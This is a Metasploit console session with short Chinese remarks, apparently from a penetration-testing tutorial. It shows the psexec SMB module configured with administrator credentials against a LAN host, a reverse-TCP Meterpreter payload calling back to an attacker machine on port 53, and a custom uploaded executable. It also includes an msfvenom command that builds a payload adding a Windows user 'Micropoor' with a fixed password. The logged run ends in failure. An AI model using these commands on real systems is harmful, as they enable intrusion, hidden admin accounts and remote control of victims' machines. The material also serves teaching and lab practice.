msf exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
RHOST 192.168.1.119 yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target fo rpretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN\$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass 123456 no The password for the specified username
SMBUser administrator no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
LPORT 53 yes The listen port
Exploit target:
Id Name
‐‐ ‐‐‐‐
0 Automatic
需设置一非,常用选项:
msf exploit(windows/smb/psexec) > set EXE::CUSTOM /var/www/html/bin_tcp_x86_53.exe
EXE::CUSTOM => /var/www/html/bin_tcp_x86_53.exe
root@John:/tmp# msfvenom ‐p windows/adduser PASS=Micropoor$123 USER=Micropoor ‐f exe >adduser.exe
[‐] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[‐] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 279 bytes
Final size of exe file: 73802 bytes
同样可以配合target的改变来解决控制管理器的强制命令接收。
攻击机设置:
msf exploit(windows/smb/psexec) > show targets
Exploit targets:
Id Name
‐‐ ‐‐‐‐
0 Automatic
1 PowerShell
2 Native upload
3 MOF upload
msf exploit(windows/smb/psexec) > set target 2
target => 2
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.5:53
[*] 192.168.1.119:445 ‐ Connecting to the server...
[*] 192.168.1.119:445 ‐ Authenticating to 192.168.1.119:445 as user 'administrator'...
[*] 192.168.1.119:445 ‐ Uploading payload... kKwZpPRs.exe
[*] 192.168.1.119:445 ‐ Using custom payload /var/www/html/bin_tcp_x86\_53.exe, RHOST and RPORT settings will be ignored!
[*] 192.168.1.119:445 ‐ Created kKwZpPRs.exe...
[‐] 192.168.1.119:445 ‐ Unable to remove the service, ERROR_CODE:
[‐] 192.168.1.119:445 ‐ Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_PIPE_EMPTY
[*] Exploit completed, but no session was created.